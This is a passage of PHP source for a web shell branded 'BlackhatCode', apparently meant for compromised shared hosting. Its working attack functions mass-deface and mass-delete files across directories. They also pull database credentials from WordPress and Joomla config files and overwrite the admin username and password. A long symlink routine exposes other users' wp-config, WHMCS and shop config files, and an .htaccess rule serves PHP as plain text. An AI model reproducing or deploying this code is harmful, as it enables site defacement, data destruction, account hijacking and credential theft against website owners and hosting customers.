  629.                 } elseif($dirb === '..') {
  630.                     if(file_exists("".dirname($dir)."/$namafile")) {
  631.                         unlink("".dirname($dir)."/$namafile");
  632.                     }
  633.                 } else {
  634.                     if(is_dir($dirc)) {
  635.                         if(is_writable($dirc)) {
  636.                             if(file_exists($lokasi)) {
  637.                                 echo "[<font color=lime>DELETED</font>] $lokasi<br>";
  638.                                 unlink($lokasi);
  639.                                 $idx = hapus_massal($dirc,$namafile);
  640.                             }
  641.                         }
  642.                     }
  643.                 }
  644.             }
  645.         }
  646.     }
  647.     function clear_fill($file,$index){
  648.         if(file_exists($file)){
  649.             $handle = fopen($file,'w');
  650.             fwrite($handle,'');
  651.             fwrite($handle,$index);
  652.             fclose($handle);  } }
  653.  
  654.     function gass(){
  655.         global $dirr , $index ;
  656.         chdir($dirr);
  657.         $me = str_replace(dirname(__FILE__).'/','',__FILE__);
  658.         $files = scandir($dirr) ;
  659.         $notallow = array(".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","..",".");
  660.         sort($files);
  661.         $n = 0 ;
  662.         foreach ($files as $file){
  663.             if ( $file != $me && is_dir($file) != 1 && !in_array($file, $notallow) ) {
  664.                 echo "<center><Span style='color: #8A8A8A;'><strong>$dirr/</span>$file</strong> ====> ";
  665.                 edit_file($file,$index);
  666.                 flush();
  667.                 $n = $n +1 ;
  668.                 }
  669.                 }
  670.                 echo "<br>";
  671.                 echo "<center><br><h3>$n Kali Anda Telah Ngecrot  Disini </h3></center><br>";
  672.                     }
  673.     function ListFiles($dirrall) {
  674.  
  675.     if($dh = opendir($dirrall)) {
  676.  
  677.        $files = Array();
  678.        $inner_files = Array();
  679.        $me = str_replace(dirname(__FILE__).'/','',__FILE__);
  680.        $notallow = array($me,".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","Thumbs.db");
  681.         while($file = readdir($dh)) {
  682.             if($file != "." && $file != ".." && $file[0] != '.' && !in_array($file, $notallow) ) {
  683.                 if(is_dir($dirrall . "/" . $file)) {
  684.                     $inner_files = ListFiles($dirrall . "/" . $file);
  685.                     if(is_array($inner_files)) $files = array_merge($files, $inner_files);
  686.                 } else {
  687.                     array_push($files, $dirrall . "/" . $file);
  688.                 }
  689.             }
  690.             }
  691.  
  692.             closedir($dh);
  693.             return $files;
  694.         }
  695.     }
  696.     function gass_all(){
  697.         global $index ;
  698.         $dirrall=$_POST['d_dir'];
  699.         foreach (ListFiles($dirrall) as $key=>$file){
  700.             $file = str_replace('//',"/",$file);
  701.             echo "<center><strong>$file</strong> ===>";
  702.             edit_file($file,$index);
  703.             flush();
  704.         }
  705.         $key = $key+1;
  706.     echo "<center><br><h3>$key Kali Anda Telah Ngecrot  Disini  </h3></center><br>"; }
  707.     function sabun_massal($dir,$namafile,$isi_script) {
  708.         if(is_writable($dir)) {
  709.             $dira = scandir($dir);
  710.             foreach($dira as $dirb) {
  711.                 $dirc = "$dir/$dirb";
  712.                 $lokasi = $dirc.'/'.$namafile;
  713.                 if($dirb === '.') {
  714.                     file_put_contents($lokasi, $isi_script);
  715.                 } elseif($dirb === '..') {
  716.                     file_put_contents($lokasi, $isi_script);
  717.                 } else {
  718.                     if(is_dir($dirc)) {
  719.                         if(is_writable($dirc)) {
  720.                             echo "[<font color=lime>DONE</font>] $lokasi<br>";
  721.                             file_put_contents($lokasi, $isi_script);
  722.                             $idx = sabun_massal($dirc,$namafile,$isi_script);
  723.                         }
  724.                     }
  725.                 }
  726.             }
  727.         }
  728.     }
  729.     if($_POST['mass'] == 'onedir') {
  730.         echo "<br> Versi Text Area<br><textarea style='background:black;outline:none;color:red;' name='index' rows='10' cols='67'>\n";
  731.         $ini="http://";
  732.         $mainpath=$_POST[d_dir];
  733.         $file=$_POST[d_file];
  734.         $dir=opendir("$mainpath");
  735.         $code=base64_encode($_POST[script]);
  736.         $indx=base64_decode($code);
  737.         while($row=readdir($dir)){
  738.         $start=@fopen("$row/$file","w+");
  739.         $finish=@fwrite($start,$indx);
  740.         if ($finish){
  741.             echo"$ini$row/$file\n";
  742.             }
  743.         }
  744.         echo "</textarea><br><br><br><b>Versi Text</b><br><br><br>\n";
  745.         $mainpath=$_POST[d_dir];$file=$_POST[d_file];
  746.         $dir=opendir("$mainpath");
  747.         $code=base64_encode($_POST[script]);
  748.         $indx=base64_decode($code);
  749.         while($row=readdir($dir)){$start=@fopen("$row/$file","w+");
  750.         $finish=@fwrite($start,$indx);
  751.         if ($finish){echo '<a href="http://' . $row . '/' . $file . '" target="_blank">http://' . $row . '/' . $file . '</a><br>'; }
  752.         }
  753.  
  754.     }
  755.     elseif($_POST['mass'] == 'sabunkabeh') { gass(); }
  756.     elseif($_POST['mass'] == 'hapusmassal') { hapus_massal($_POST['d_dir'], $_POST['d_file']); }
  757.     elseif($_POST['mass'] == 'sabunmematikan') { gass_all(); }
  758.     elseif($_POST['mass'] == 'massdeface') {
  759.         echo "<div style='margin: 5px auto; padding: 5px'>";
  760.         sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  761.         echo "</div>";  }
  762.     else {
  763.         echo "<br>
  764.         <center><font style='text-decoration: underline;'>
  765.         Select Type:<br>
  766.         </font>
  767.         <select class=\"select\" name=\"mass\"  style=\"width: 450px;\" height=\"10\">
  768.         <option value=\"onedir\">Mass Deface 1 Dir</option>
  769.         <option value=\"massdeface\">Mass Deface ALL Dir</option>
  770.         <option value=\"sabunkabeh\">Sabun Massal Di Tempat</option>
  771.         <option value=\"sabunmematikan\">Sabun Massal Bunuh Diri</option>
  772.         <option value=\"hapusmassal\">Mass Delete Files</option></center></select><br>
  773.         <font style='text-decoration: underline;'>Folder:</font><br>
  774.         <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
  775.         <font style='text-decoration: underline;'>Filename:</font><br>
  776.         <input type='text' name='d_file' value='bct.php' style='width: 450px;' height='10'><br>
  777.         <font style='text-decoration: underline;'>Index File:</font><br>
  778.         <textarea name='script' style='width: 450px; height: 200px;'>Hacked By BlackhatCode</textarea><br>
  779.         <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
  780.         </form></center>";
  781.         }
  782.     }
  783.  
  784. elseif($_GET['do'] == 'auto_cu_wp') {
  785. if($_POST['gass']) {
  786.     echo "<center><h1>WordPress Auto Change User V2</h1>
  787.         <form method='post'>
  788.         Link Config: <br>
  789.         <textarea name='link' style='width: 450px; height:250px;'>";
  790.     UrlLoop($_POST['linkconf'],'wordpress');   
  791.     echo"</textarea><br>
  792.         <input type='submit' style='width: 450px;' name='auto_cu_wp' value='Start Now!'>
  793.         </form></center>";
  794. }   else {
  795.         echo "<center><h1>WordPress Auto Change User V2</h1>
  796.         <form method='post'>
  797.         Link Config: <br>
  798.         <input type='text' name='linkconf' height='10' size='50' placeholder='http://link.com/bct_config2/'><br>
  799.         <input type='submit' style='width: 450px;' name='gass' value='Start Now!'>
  800.         </form></center>";
  801.     }
  802. if($_POST['auto_cu_wp']) {
  803.    
  804.         function anucurl($sites) {
  805.             $ch = curl_init($sites);
  806.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  807.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  808.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  809.                   curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  810.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  811.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  812.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  813.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  814.                   curl_setopt($ch, CURLOPT_COOKIESESSION,true);
  815.             $data = curl_exec($ch);
  816.                   curl_close($ch);
  817.             return $data;
  818.         }
  819.         $link = explode("\r\n", $_POST['link']);
  820.         $user = "blackhatcode";
  821.         $pass = "blackhatcode";
  822.         $passx = md5($pass);
  823.         foreach($link as $dir_config) {
  824.             $config = anucurl($dir_config);
  825.             $dbhost = ambilkata($config,"DB_HOST', '","'");
  826.             $dbuser = ambilkata($config,"DB_USER', '","'");
  827.             $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  828.             $dbname = ambilkata($config,"DB_NAME', '","'");
  829.             $dbprefix = ambilkata($config,"table_prefix  = '","'");
  830.             $prefix = $dbprefix."users";
  831.             $option = $dbprefix."options";
  832.             $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  833.             $db = mysql_select_db($dbname);
  834.             $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  835.             $result = mysql_fetch_array($q);
  836.             $id = $result[ID];
  837.             $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  838.             $result2 = mysql_fetch_array($q2);
  839.             $target = $result2[option_value];
  840.             if($target == '') {                
  841.                 echo "[-] <font color=red>Error, gabisa ambil nama domain nya</font><br>";
  842.             } else {
  843.                 echo "<font color=blue>[</font> $target <font color=blue>]</font></font><br>";
  844.             }
  845.             $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
  846.             if(!$conn OR !$db OR !$update) {
  847.                 echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
  848.                 mysql_close($conn);
  849.             } else {
  850.                     echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
  851.                     echo "[+] username: <font color=lime>$user</font><br>";
  852.                     echo "[+] password: <font color=lime>$pass</font><br><br>";    
  853.                    
  854.                 mysql_close($conn);
  855.             }
  856.         }
  857.     }  
  858.  
  859. }
  860. elseif($_GET['do'] == 'auto_cu_joomla') {
  861. if($_POST['gass']) {
  862.     echo "<center><h1>Joomla Auto Change User V2</h1>
  863.         <form method='post'>
  864.         Link Config: <br>
  865.         <textarea name='link' style='width: 450px; height:250px;'>";
  866.     UrlLoop($_POST['linkconf'],'joomla');  
  867.     echo"</textarea><br>
  868.         <input type='submit' style='width: 450px;' name='auto_cu_joomla' value='Start Now!'>
  869.         </form></center>";
  870. }   else {
  871.         echo "<center><h1>Joomla Auto Change User V2</h1>
  872.         <form method='post'>
  873.         Link Config: <br>
  874.         <input type='text' name='linkconf' height='10' size='50' placeholder='http://link.com/bct_config2/'><br>
  875.         <input type='submit' style='width: 450px;' name='gass' value='Start Now!'>
  876.         </form></center>";
  877.     }
  878. if($_POST['auto_cu_joomla']) {
  879.    
  880.         function anucurl($sites) {
  881.             $ch = curl_init($sites);
  882.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  883.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  884.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  885.                   curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  886.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  887.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  888.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  889.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  890.                   curl_setopt($ch, CURLOPT_COOKIESESSION,true);
  891.             $data = curl_exec($ch);
  892.                   curl_close($ch);
  893.             return $data;
  894.         }
  895.         $link = explode("\r\n", $_POST['link']);
  896.         $user = "blackhatcode";
  897.         $pass = "blackhatcode";
  898.         $passx = md5($pass);
  899.         foreach($link as $dir_config) {
  900.             $config = anucurl($dir_config);
  901.                     $dbhost = ambilkata($config,"host = '","'");
  902.                     $dbuser = ambilkata($config,"user = '","'");
  903.                     $dbpass = ambilkata($config,"password = '","'");
  904.                     $dbname = ambilkata($config,"db = '","'");
  905.                     $dbprefix = ambilkata($config,"dbprefix = '","'");
  906.                     $prefix = $dbprefix."users";
  907.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  908.                     $db = mysql_select_db($dbname);
  909.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  910.                     $result = mysql_fetch_array($q);
  911.                     $id = $result['id'];
  912.                     $site = ambilkata($config,"sitename = '","'");
  913.                     $update = mysql_query("UPDATE $prefix SET username='$user',password='$passx' WHERE id='$id'");
  914.                     echo "Config => ".$dir_config."<br>";
  915.                     echo "CMS => Joomla<br>";
  916.                     if($site == '') {
  917.                         echo "Sitename => <font color=red>Error, gabisa ambil nama domain nya</font><br>";
  918.                     } else {
  919.                         echo "Sitename => $site<br>";
  920.                     }
  921.                     if(!$update OR !$conn OR !$db) {
  922.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  923.                     } else {
  924.                         echo "Status => Done , Username : <font color=lime>$user</font> Password : <font color=lime>$pass</font><br><br>";
  925.                     }
  926.                     mysql_close($conn);
  927.                     }
  928.     }  
  929. }
  930. elseif($_GET['do'] == 'symconfig') {
  931. if(strtolower(substr(PHP_OS, 0, 3)) == "win"){
  932. echo '<script>alert("Skid this won\'t work on Windows")</script>';
  933. exit;
  934. }
  935. else
  936. {
  937. if($_POST["m"] && !$_POST["passwd"]==""){
  938. @mkdir("bct_config2", 0777);
  939. @chdir("bct_config2");
  940. @symlink("/","root");
  941. $htaccess="Options Indexes FollowSymLinks
  942. DirectoryIndex bct.htm
  943. AddType text/plain .php
  944. AddHandler text/plain .php
  945. Satisfy Any";
  946. @file_put_contents(".htaccess",$htaccess);
  947. $etc_passwd=$_POST["passwd"];
  948. $etc_passwd=explode("\n",$etc_passwd);
  949. foreach($etc_passwd as $passwd){
  950. $pawd=explode(":",$passwd);
  951. $user =$pawd[0];
  952.  
  953. @symlink('/','bct_config2/root');
  954. @symlink('/home/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  955. @symlink('/home/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  956. @symlink('/home/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  957. @symlink('/home/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  958. @symlink('/home/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  959. @symlink('/home/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  960. @symlink('/home/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  961. @symlink('/home/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  962. @symlink('/home/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  963. @symlink('/home/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  964. @symlink('/home/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  965. @symlink('/home/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  966. @symlink('/home/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  967. @symlink('/home/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  968. @symlink('/home/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  969. @symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  970. @symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  971. @symlink('/home/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  972. @symlink('/home/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  973. @symlink('/home/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  974. @symlink('/home/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  975. @symlink('/home/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  976. @symlink('/home/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  977. @symlink('/home/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  978. @symlink('/home/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  979. @symlink('/home/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  980. @symlink('/home/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  981. @symlink('/home/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  982. @symlink('/home/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  983. @symlink('/home/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  984. @symlink('/home/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  985. @symlink('/home/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  986. @symlink('/home/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  987. @symlink('/home/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  988. @symlink('/home/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  989. @symlink('/home/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  990. @symlink('/home/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  991. @symlink('/home/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  992. @symlink('/home/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  993. @symlink('/home/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  994. @symlink('/home/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  995. @symlink('/home/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  996. @symlink('/home/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  997. @symlink('/home/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  998. @symlink('/home/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  999. @symlink('/home/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  1000. @symlink('/home/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  1001. @symlink('/home/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  1002. @symlink('/home/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  1003. @symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1004. @symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1005. @symlink('/home/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  1006. @symlink('/home/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  1007. @symlink('/home/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  1008. @symlink('/home/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  1009. @symlink('/home/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  1010. @symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  1011. @symlink('/home/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  1012. @symlink('/home/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  1013. @symlink('/home/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  1014. @symlink('/home/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  1015. @symlink('/home/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  1016. @symlink('/home/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  1017. @symlink('/home/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  1018. @symlink('/home/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  1019. @symlink('/home/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  1020. @symlink('/home/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  1021. @symlink('/home/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  1022. @symlink('/home/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  1023. @symlink('/home/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  1024. @symlink('/home/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  1025. @symlink('/home/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  1026. @symlink('/home/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  1027. @symlink('/home/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  1028. @symlink('/home/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  1029. @symlink('/home/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  1030. @symlink('/home/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  1031. @symlink('/home/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  1032. @symlink('/home/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  1033. @symlink('/home/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  1034. @symlink('/home/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  1035. @symlink('/home/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  1036. @symlink('/home/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  1037. @symlink('/home/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  1038. @symlink('/home/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  1039. @symlink('/home/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  1040. @symlink('/home/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  1041. @symlink('/home/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  1042. @symlink('/home/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  1043. @symlink('/home/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  1044. @symlink('/home/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  1045. @symlink('/home/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  1046. @symlink('/home/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  1047. @symlink('/home/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  1048. @symlink('/home/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  1049. @symlink('/home/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  1050. @symlink('/home/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  1051. @symlink('/home/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  1052. @symlink('/home/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  1053. @symlink('/home/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1054. @symlink('/home/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1055. @symlink('/home/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1056. @symlink('/home/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  1057. @symlink('/home/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  1058. @symlink('/home/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  1059. @symlink('/home/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  1060. @symlink('/home/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  1061. @symlink('/home/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  1062. @symlink('/home/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  1063. @symlink('/home/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  1064. @symlink('/home/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  1065. @symlink('/home/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  1066. @symlink('/home/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  1067. @symlink('/home/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  1068. @symlink('/home/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  1069. @symlink('/home/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  1070. @symlink('/home/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  1071. @symlink('/home/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  1072. @symlink('/home/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  1073. @symlink('/home/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  1074. @symlink('/home/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  1075. @symlink('/home/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  1076. @symlink('/home/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  1077. @symlink('/home/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  1078. @symlink('/home/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  1079. @symlink('/home/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  1080. @symlink('/home/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1081. @symlink('/home/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1082. @symlink('/home/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1083. @symlink('/home/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  1084. @symlink('/home/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  1085. @symlink('/home/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  1086. @symlink('/home/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  1087. @symlink('/home/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  1088. @symlink('/home/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  1089. @symlink('/home/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  1090. @symlink('/home/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  1091. @symlink('/home/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  1092. @symlink('/home/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  1093. @symlink('/home/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  1094. @symlink('/home/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  1095. @symlink('/home/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  1096. @symlink('/home/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  1097. @symlink('/home/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  1098. @symlink('/home/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  1099. @symlink('/home/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  1100. @symlink('/home/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  1101. @symlink('/home/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  1102. @symlink('/home/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  1103. @symlink('/home/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  1104. @symlink('/home/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  1105. @symlink('/home/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  1106. @symlink('/home/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  1107. @symlink('/home/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  1108. @symlink('/home/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  1109. @symlink('/home/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  1110. @symlink('/home/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  1111. @symlink('/home/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  1112. @symlink('/home/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  1113. @symlink('/home/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  1114. @symlink('/home/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  1115. @symlink('/home/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  1116. @symlink('/home/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
